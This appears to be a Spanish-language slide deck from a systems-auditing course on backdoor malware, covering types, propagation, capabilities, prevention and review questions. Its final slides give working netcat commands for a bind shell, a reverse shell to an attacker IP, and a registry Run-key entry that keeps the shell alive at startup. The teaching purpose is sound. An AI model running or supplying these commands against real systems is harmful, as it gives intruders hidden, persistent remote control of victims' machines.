BACKDOORS

AUDITORIA DE SISTEMAS
SOFTWARE MALINTENCIONADO

Software malintencionado o “malware” (malicious software):

término para designar un programa informático que provoca de
forma intencionada una acción dañina para el sistema y/o usuario.

Tipos de malware
ampliación
 Spyware
definición clásica
 Backdoors
 Virus
 Keyloggers
 Gusanos
evolución  Dialers
 Troyanos
 RootKits
 Bombas lógicas
 Exploits
…
TIPOS DE MALWARE: BACKDOOR

Backdoor: o puerta trasera, permite acceso y control remoto de un

sistema sin una autentificación legítima.

Ejemplo
Backdoor BackOrifice
módulo cliente (atacante) y módulo servidor (víctima)
servidor .exe por defecto abre puerto TCP/31337
atacante obtiene control total sobre la víctima
lectura/escritura de archivos, ejecutar aplicaciones,
reiniciar el sistema, visualizar la pantalla, manejar el ratón
y teclado de la víctima, robar contraseñas, etc.
LOS MAS CONOCIDOS

Los más conocidos son Back Orifice y NetBus, dos de

los primeros backdoors, que hasta nuestros días
siguen vigentes aunque en menor cantidad.

Otro muy conocido es el SubSeven, que también fue

introducido en millones de sistemas en el mundo.
NOMENCLATURA EN LA IDENTIFICACIÓN DEL
MALWARE

Prefijos y sufijos más comunes

W32 afecta a plataformas Windows 32bits
W95 afecta a plataformas Windows 9X/Me
WM virus de macro para Word
XM virus de macro para Excel
Worm gusano
Troj troyano
Bck backdoor
VBS escrito en Visual Basic Script
JS escrito en Java Script
Joke broma
@mm se propaga por e-mail de forma masiva
BACKDOORS

Un backdoor es un programa que se introduce en el ordenador

de manera encubierta, aparentando ser inofensivo. Una vez es
ejecutado, establece una "puerta trasera" a través de la cual es
posible controlar el ordenador afectado. Esto permite realizar
en el mismo acciones que pueden comprometer la
confidencialidad del usuario o dificultar su trabajo.
Las acciones permitidas por los backdoors pueden resultar muy
perjudiciales. Entre ellas se encuentran la eliminación de
ficheros o la destrucción de la información del disco duro.
Además, pueden capturar y reenviar datos confidenciales a una
dirección externa o abrir puertos de comunicaciones,
permitiendo que un posible intruso controle nuestro ordenador
de forma remota.
Algunos ejemplos de backdoors son: Orifice2K.sfx, Bionet.318,
Antilam y Subseven.213.
BACKDOORS

CONCEPTOS

• Serie de aplicaciones o de secuencias de código que

permiten el acceso no autorizado de un
usuario/intruso a un sistema.
• 65535 puertos TCP/IP destinados a correr servicios
• Su misión es pasar desapercibidos, y estar a la escucha
hasta que el atacante lo use.
• Aprovechan bugs en los sistemas o son creadas por el
programador para tener acceso al mismo.
BACKDOORS

CONCEPTOS

• Los Backdoors, han empezado a consolidarse como la

temible nueva generación del vandalismo cibernético.

• Pueden tomar el control de los sistemas infiltrados:

Servidores, Estaciones de Trabajo o PCs.

• Los Backdoors no son esencialmente virus, sino

"Herramientas de Control Remoto“ con fines
malintencionados.
BACKDOORS

Estructura de los Backdoors

• Tienen dos componentes principales: el programa Servidor,

que se instala en el sistema de la víctima y el programa
Cliente que actúa en la computadora del atacante.

• Establecen una relación Cliente/Servidor.

• El atacante puede ejecutar remotamente acciones con

privilegios de administrador.
BACKDOORS

Formas de Propagación

Ejecutar aplicaciones
Abrir archivos adjuntos
Ingenieria Social
Configuración débil del sistema operativo
Configuración débil de aplicaciones Internet
Vulnerabilidades del S.O. y aplicaciones
BACKDOORS

Troyanos

Camuflados dentro de otro programa conocido que nos

pueda interesar:
"Última versión de photoshop+crack descárgalo ahora".

En este caso la Backdoor se instalara en segundo plano

mientras se instala la aplicación descargada. De esta
forma el usuario no se dará por enterado de nada.
BACKDOORS

Mensajes de Correo Electrónico

Es la forma más fácil de propagación; por medio de un

archivo adjunto a un mensaje.

Si el receptor comete el error de ejecutarlo, instalará el

Servidor del Backdoor sin saberlo, permitiendo que el
intruso pueda controlar el sistema infectado.

postales, fotos pornográficas,…

BACKDOORS

Telnet

Emulación de terminal para las redes TCP/IP.

Funcionan en modo Cliente/Servidor permitiendo ejecutar

comandos en el equipo infectado.

El intruso a través del Telnet puede ejecutar cada

instrucción como si la hubiera ingresado directamente en
la consola de la maquina local.
BACKDOORS

Otras Formas

Redes Compartidas

Otros servicios de Internet (HTTP, FTP, ICQ, Chat,

Mensajería Instantánea)

Usuarios de una misma red local o por medio de unidades

de almacenamiento extraible.

El sabotaje interno.
CAPACIDADES DE LOS BACKDOORS

•Extraer y enviar información del sistema al intruso.

•Robar o alterar passwords.
•Anular procesos en ejecución.
•Mostrar mensajes en la pantalla.
•Manipular el Mouse/Teclado.
•Mostrar/ocultar la Barra de Tareas.
•Abrir y cerrar la bandeja del CD.
•Reiniciar el sistema.
•Formatear el disco duro.
RECOMENDACIONES

Visión actual en la prevención

RECOMENDACIONES

Factor S.O. y aplicaciones

Filtrado y protección de las comunicaciones.

Actualización de software (parches de seguridad).

Monitoreo intensivo y Auditoria.

No usar Claves de Acceso con nombres obvios o asociados al de

los usuarios, como fechas de nacimiento, apelativos, etc.

Una estricta política de manejo y control de los usuarios en

carpetas compartidas
RECOMENDACIONES

Factor S.O. y aplicaciones

Desactivar los servicios no necesarios.

Aplicar actualizaciones automáticas
Configuración segura navegador y correo
Políticas de uso de portátiles, PDAs, memorias USB.
Segmentación lógica redes
Políticas de privilegios según usuario y aplicaciones
Políticas de seguridad de recursos compartidos
Políticas de backups
RECOMENDACIONES

Factor humano
Educar / formar al usuario. Cultura de seguridad.
Formatos potencialmente peligrosos
No abrir archivos no solicitados
No utilizar fuentes no confiables
Navegación segura
Política de passwords
Copias de seguridad
BACKDOOR CON NETCAT

LISTADO DE COMANDOS
-d modo oculto o demonio (queda ejecutándose sin interactuar con el equipo)
-e prog ejecuta programa indicado a continuación del parámetro (usado para shells
remotas)
-g gateway source-routing hop point, up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h Ayuda
-i secs tiempo de espera para líneas enviadas o entre puertos escaneados
-l escucha de conexiones entrantes (tras sesión TCP/UDP deja de escuchar)
-L como -l pero permanece escuchando tras sesión TCP/UDP
-n no realiza resoluciones DNS (realizadas por defecto)
-o file hex dump of traffic
-p port número de puerto
-r randomize local and remote ports
-s addr local source address
-t responde negociaciones TELNET
-u modo UDP (por defecto es TCP)
-v modo detallado(-v -v es aun más detallado)
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning>
BACKDOOR CON NETCAT: CONEXION DIRECTA

Escenario: Equipo atacante 192.168.1.3

Equipo victima    192.168.1.10

lo primero es dejar un netcat en la victima de la siguiente manera:

nc -d -l -L -e cmd.exe -p 1234   

Este comando le dice al nc que abra el puerto 1234 y nos espere con una
consola (cmd.exe)

Ahora solo debemos conectarnos a la victima, abrimos el netcat y

ejecutamos el comando:
nc -vv 192.168.1.10 1234
BACKDOOR CON NETCAT: CONEXION INVERSA

En este tipo de conexión no somos nosotros los que nos conectamos a

la victima, sino es la victima la que se conecta a nosotros.

Lo primero es dejar en nuestro sistema un netcat de la siguiente forma:

nc -vv -l -L -p 8080

ahora nuestro sistema esta preparado para recibir conecciones al puerto

8080, solo queda dejar en el equipo victima un netcat de la siguiente
manera:

nc -d -e cmd.exe 192.168.1.3 8080

BACKDOOR CON NETCAT: COMO BACKDOOR

Desde la consola se ejecuta:

Reg  add   
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run/v
user32 /d C:\windows\system32\nc "parametros“

Parametros:

nc -d -L -l -e cmd.exe -p <puerto> 'que se quede en un puerto a la escucha.

nc -d -e cmd.exe <IP> <puerto> ' que se conecte a una ip.

Preguntas y respuestas
 Defina el modo de funcionamiento de los Backdoor

 Describa los componentes de los Backdoors y su funcion.

 Describa los modos de propagacion de los Backdoors

 Describa recomendaciones para evitar la infiltracion de los

Backdoors aplicadas a los sistemas.

 Describa recomendaciones para evitar la infiltracion de los

Backdoors aplicadas al factor humano.